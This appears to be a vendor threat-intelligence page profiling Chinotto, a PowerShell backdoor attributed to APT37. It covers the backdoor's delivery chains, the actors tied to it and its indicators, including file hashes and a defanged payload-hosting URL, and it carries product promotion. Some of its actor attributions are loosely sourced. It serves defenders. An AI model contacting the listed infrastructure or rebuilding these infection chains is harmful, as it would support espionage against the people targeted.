MalwareUsed by 3 actors

Chinotto

Chinotto is a PowerShell-based backdoor malware family associated with North Korea-linked APT37/ScarCruft (also tracked as Reaper, Ruby Sleet, and Velvet Chollima) and the ChinopuNK sub-cluster. It has been used for espionage, surveillance, and data theft, including campaigns targeting journalists, human rights activists, North Korean defectors, media organizations, high-profile academics, and South Korea-related policy, research, and defense-linked targets. Reported capabilities include command execution, file transfer, exfiltration of system information, and persistence via the registry and scheduled tasks. Reporting also states Chinotto has supported attacks against both Windows and Android systems.

Observed delivery vectors include spear-phishing and malicious archives containing CHM help files, LNK shortcut files, macro-enabled Word documents, HWP documents with embedded OLE objects, and a malicious Excel XLL add-in. In multiple documented chains, these lures execute MSHTA to retrieve an HTA payload containing the Chinotto PowerShell backdoor. Specific examples in the reporting include CHM files delivered with password-protected decoy documents, LNK files with dual extensions such as "html.lnk" and "pdf.lnk," Word macros that fetch the same HTA payload, HWP-embedded PE loaders that invoke MSHTA, and an XLL uploaded to GitHub on 2023-03-15 that dropped a decoy XLS and downloaded an HTA from hxxp://yangak[.]com/data/cheditor4/pro/temp/5.html. More recent reporting describes ZIP archives containing LNK or CHM files that drop CHILLYCHINO or Chinotto, which then contacts C2 to retrieve a next-stage payload used to launch FadeStealer.

Chinotto remains one of the core malware families historically used by APT37. It has been explicitly described as a highly customizable backdoor and as part of the group’s "Chinotto" cluster, distinct from its RokRat operations. Mentioned artifacts and indicators tied to Chinotto delivery include the XLL MD5 82d58de096f53e4df84d6f67975a8dda, HWP MD5 a4706737645582e1b5f71a462dd01140, extracted loader MD5 d8c9a357da3297e7ccb2ed3a5761e59f, dropped decoy path C:\programdata\20230315_SejeongSupport.xls, LNK metadata showing MAC address 00:0c:29:41:1b:1c, and the filename HqcUpdate.exe identified in one report as a final information-stealing payload referred to as Chinotto.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

APT37

It is worth noting that this isn’t the first time APT37 has been linked to malware campaigns targeting journalists, with the most recent being a November 2021 report employing the highly-customizable “Chinotto” backdoor.

via bleeping computerbleepingcomputer.com

TA-RedAnt

“Chinotto: PowerShell Backdoor (File Transfer, Command Execution, Registry and Scheduled Tasks)”

via ahnlab asec blogasec.ahnlab.com

Kimsuky

For years, the group relied on a malware family called Chinotto to carry out espionage and data theft.

via cyber security newscybersecuritynews.com

MITRE ATT&CK

Techniques & procedures

1 distinct technique documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique

T1566PhishingEvidence1

TacticInitial Access

The malware is distributed through a phishing attack... The phishing emails originated from the account of the former director of South Korea’s National Intelligence Service (NIS), who APT37 previously compromised.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

14 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app24 days ago

ACTIVITY FEED

Recent activity

10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

10 SOURCESView more in app

cyber security newsNews

May 12, 2026

New Stealthy Vidar Stealer Campaign Bypass EDR and Steal Credentials

Named as the final information-stealing payload in the campaign.

cyber security newsNews

Feb 27, 2026

North Korean APT37 Hackers Leverages Novel Malware to Infect Air‑Gapped Systems

An APT37-associated malware family used historically for espionage and data theft.

ahnlab asec blogNews

Oct 21, 2025

September 2025 APT Group Trends

PowerShell backdoor supporting file transfer and command execution, with persistence via registry and scheduled tasks; delivered via LNK/CHM/HTA/PowerShell chains.

the hacker newsNews

Sep 21, 2025

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware in Crypto Job Scams

PowerShell-based backdoor used by APT37, often as a counterpart to CHILLYCHINO, to retrieve and launch additional payloads such as FadeStealer.

+6 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching14

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution3

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping1

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.